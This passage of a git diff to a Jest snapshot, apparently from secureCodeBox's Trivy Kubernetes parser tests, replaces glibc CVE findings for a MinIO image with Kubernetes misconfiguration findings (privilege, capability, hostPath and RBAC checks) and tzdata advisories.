"https://avd.aquasec.com/misconfig/ksv020", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2010-4756", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, ], "severity": "LOW", @@ -115495,62 +115233,115 @@ exports[`should parse a trivy-k8s scan result of a cluster running secureCodeBox { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-20796", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc-bin", + "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV021", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://www.securityfocus.com/bid/107160", - "https://access.redhat.com/security/cve/CVE-2018-20796", - "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", - "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", - "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", - "https://security.netapp.com/advisory/ntap-20190315-0002/", - "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", - "https://www.cve.org/CVERecord?id=CVE-2018-20796", + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv021", ], }, - "category": "Vulnerability", - "description": "In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(\\227|)(\\\\1\\\\1|t1|\\\\\\2537)+' in grep.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", + "category": "Misconfiguration", + "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", + "name": "Runs with low group ID(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'securityContext.runAsGroup' > 10000)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-20796", - }, - { - "type": "URL", - "value": "http://www.securityfocus.com/bid/107160", + "value": "https://avd.aquasec.com/misconfig/ksv021", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-20796", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV023", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv023", + ], + }, + "category": "Misconfiguration", + "description": "HostPath volumes must be forbidden.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": "Do not set 'spec.volumes[*].hostPath'.", + "name": "hostPath volumes mounted(DaemonSet 'kube-proxy' should not set 'spec.template.volumes.hostPath')", + "references": [ { "type": "URL", - "value": "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", + "value": "https://avd.aquasec.com/misconfig/ksv023", }, { "type": "URL", - "value": "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV030", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv030", + ], + }, + "category": "Misconfiguration", + "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", + "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", + "value": "https://avd.aquasec.com/misconfig/ksv030", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20190315-0002/", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV106", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv106", + ], + }, + "category": "Misconfiguration", + "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", + "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "references": [ { "type": "URL", - "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "value": "https://avd.aquasec.com/misconfig/ksv106", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-20796", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, ], "severity": "LOW", @@ -115558,188 +115349,478 @@ exports[`should parse a trivy-k8s scan result of a cluster running secureCodeBox { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010022", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc-bin", + "foundIn": "Target: 'ClusterRole/system:aggregate-to-admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV050", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "https://access.redhat.com/security/cve/CVE-2019-1010022", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", - "https://security-tracker.debian.org/tracker/CVE-2019-1010022", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", - "https://ubuntu.com/security/CVE-2019-1010022", - "https://www.cve.org/CVERecord?id=CVE-2019-1010022", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv050", ], }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass stack guard protection. The component is: nptl. The attack vector is: Exploit stack buffer overflow vulnerability and use this bypass vulnerability to bypass stack guard. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "glibc: stack guard protection bypass", + "category": "Misconfiguration", + "description": "An effective level of access equivalent to cluster-admin should not be provided.", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:aggregate-to-admin", + "mitigation": "Remove write permission verbs for resource 'roles' and 'rolebindings'", + "name": "Do not allow management of RBAC resources(ClusterRole 'system:aggregate-to-admin' should not have access to resources ["roles", "rolebindings"] for verbs ["create", "update", "delete", "deletecollection", "impersonate", "*"])", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010022", + "value": "https://avd.aquasec.com/misconfig/ksv050", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010022", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:aggregate-to-edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV041", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv041", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits managing secrets", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:aggregate-to-edit", + "mitigation": "Create a role which does not permit to manage secrets if not needed", + "name": "Do not allow management of secrets(Role permits management of secret(s))", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", + "value": "https://avd.aquasec.com/misconfig/ksv041", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010022", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:aggregate-to-edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV041", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv041", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits managing secrets", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:aggregate-to-edit", + "mitigation": "Create a role which does not permit to manage secrets if not needed", + "name": "Do not allow management of secrets(Role permits management of secret(s))", + "references": [ { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", + "value": "https://avd.aquasec.com/misconfig/ksv041", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:aggregate-to-edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:aggregate-to-edit", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010022", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010022", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010023", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc-bin", + "foundIn": "Target: 'ClusterRole/system:aggregate-to-edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://www.securityfocus.com/bid/109167", - "https://access.redhat.com/security/cve/CVE-2019-1010023", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", - "https://security-tracker.debian.org/tracker/CVE-2019-1010023", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", - "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010023", - "https://www.cve.org/CVERecord?id=CVE-2019-1010023", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", ], }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Re-mapping current loaded library with malicious ELF file. The impact is: In worst case attacker may evaluate privileges. The component is: libld. The attack vector is: Attacker sends 2 ELF files to victim and asks to run ldd on it. ldd execute code. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "glibc: running ldd on malicious ELF leads to code execution because of wrong size computation", + "category": "Misconfiguration", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:aggregate-to-edit", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010023", - }, - { - "type": "URL", - "value": "http://www.securityfocus.com/bid/109167", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010023", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:aggregate-to-edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:aggregate-to-edit", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010023", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:aggregate-to-edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:aggregate-to-edit", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "references": [ { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:aggregate-to-edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV049", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv049", + ], + }, + "category": "Misconfiguration", + "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:aggregate-to-edit", + "mitigation": "Remove write permission verbs for resource 'configmaps'", + "name": "Do not allow management of configmaps(ClusterRole 'system:aggregate-to-edit' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010023", + "value": "https://avd.aquasec.com/misconfig/ksv049", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010023", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010024", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc-bin", + "foundIn": "Target: 'ClusterRole/system:aggregate-to-edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://www.securityfocus.com/bid/109162", - "https://access.redhat.com/security/cve/CVE-2019-1010024", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", - "https://security-tracker.debian.org/tracker/CVE-2019-1010024", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", - "https://support.f5.com/csp/article/K06046097", - "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010024", - "https://www.cve.org/CVERecord?id=CVE-2019-1010024", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", ], }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass ASLR using cache of thread stack and heap. The component is: glibc. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "glibc: ASLR bypass using cache of thread stack and heap", + "category": "Misconfiguration", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:aggregate-to-edit", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'system:aggregate-to-edit' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010024", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/109162", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:aggregate-to-edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", + ], + }, + "category": "Misconfiguration", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:aggregate-to-edit", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'system:aggregate-to-edit' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010024", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:aggregate-to-edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", + ], + }, + "category": "Misconfiguration", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:aggregate-to-edit", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'system:aggregate-to-edit' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010024", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "2020d-0+deb9u1", + "foundIn": "Target: 'k8s.gcr.io/etcd:3.4.13-0 (debian 9.13)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "DLA-2424-1", + "installedVersion": "2020a-0+deb9u1", + "packageName": "tzdata", + "references": undefined, + }, + "category": "Vulnerability", + "description": undefined, + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": undefined, + "name": "tzdata - new upstream version", + "references": [], + "severity": "INFORMATIONAL", + }, + { + "attributes": { + "fixedVersion": "2020e-0+deb9u1", + "foundIn": "Target: 'k8s.gcr.io/etcd:3.4.13-0 (debian 9.13)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "DLA-2509-1", + "installedVersion": "2020a-0+deb9u1", + "packageName": "tzdata", + "references": undefined, + }, + "category": "Vulnerability", + "description": undefined, + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": undefined, + "name": "tzdata - new upstream version", + "references": [], + "severity": "INFORMATIONAL", + }, + { + "attributes": { + "fixedVersion": "2021a-0+deb9u1", + "foundIn": "Target: 'k8s.gcr.io/etcd:3.4.13-0 (debian 9.13)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "DLA-2542-1", + "installedVersion": "2020a-0+deb9u1", + "packageName": "tzdata", + "references": undefined, + }, + "category": "Vulnerability", + "description": undefined, + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": undefined, + "name": "tzdata - new upstream version", + "references": [], + "severity": "INFORMATIONAL", + }, + { + "attributes": { + "fixedVersion": "2021a-0+deb9u2", + "foundIn": "Target: 'k8s.gcr.io/etcd:3.4.13-0 (debian 9.13)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "DLA-2797-1", + "installedVersion": "2020a-0+deb9u1", + "packageName": "tzdata", + "references": undefined, + }, + "category": "Vulnerability", + "description": undefined, + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": undefined, + "name": "tzdata - new upstream version", + "references": [], + "severity": "INFORMATIONAL", + }, + { + "attributes": { + "fixedVersion": "2021a-0+deb9u3", + "foundIn": "Target: 'k8s.gcr.io/etcd:3.4.13-0 (debian 9.13)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "DLA-2963-1", + "installedVersion": "2020a-0+deb9u1", + "packageName": "tzdata", + "references": undefined, + }, + "category": "Vulnerability", + "description": undefined, + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": undefined, + "name": "tzdata - new timezone database", + "references": [], + "severity": "INFORMATIONAL", + }, + { + "attributes": { + "fixedVersion": "2021a-0+deb9u4", + "foundIn": "Target: 'k8s.gcr.io/etcd:3.4.13-0 (debian 9.13)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "DLA-3051-1", + "installedVersion": "2020a-0+deb9u1", + "packageName": "tzdata", + "references": undefined, + }, + "category": "Vulnerability", + "description": undefined, + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": undefined, + "name": "tzdata - new timezone database", + "references": [], + "severity": "INFORMATIONAL", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV001", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv001", + ], + }, + "category": "Misconfiguration", + "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", + "name": "Process can elevate its own privileges(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'securityContext.allowPrivilegeEscalation' to false)", + "references": [ { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097", + "value": "https://avd.aquasec.com/misconfig/ksv001", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV003", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "https://avd.aquasec.com/misconfig/ksv003", + ], + }, + "category": "Misconfiguration", + "description": "The container should drop all default capabilities and add only those that are needed for its execution.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", + "name": "Default capabilities not dropped(Container 'etcd' of Pod 'etcd-kind-control-plane' should add 'ALL' to 'securityContext.capabilities.drop')", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010024", + "value": "https://avd.aquasec.com/misconfig/ksv003", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010024", + "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", }, ], "severity": "LOW", @@ -115747,62 +115828,57 @@ exports[`should parse a trivy-k8s scan result of a cluster running secureCodeBox { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010025", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc-bin", + "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV009", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "https://access.redhat.com/security/cve/CVE-2019-1010025", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", - "https://security-tracker.debian.org/tracker/CVE-2019-1010025", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", - "https://support.f5.com/csp/article/K06046097", - "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010025", - "https://www.cve.org/CVERecord?id=CVE-2019-1010025", + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv009", ], }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created thread. The component is: glibc. NOTE: the vendor's position is "ASLR bypass itself is not a vulnerability."", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "glibc: information disclosure of heap addresses of pthread_created thread", + "category": "Misconfiguration", + "description": "Sharing the host’s network namespace permits processes in the pod to communicate with processes bound to the host’s loopback adapter.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": "Do not set 'spec.template.spec.hostNetwork' to true.", + "name": "Access to host network(Pod 'etcd-kind-control-plane' should not set 'spec.template.spec.hostNetwork' to true)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010025", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010025", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", - }, - { - "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010025", - }, - { - "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", - }, - { - "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097", + "value": "https://avd.aquasec.com/misconfig/ksv009", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV011", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "https://avd.aquasec.com/misconfig/ksv011", + ], + }, + "category": "Misconfiguration", + "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", + "location": 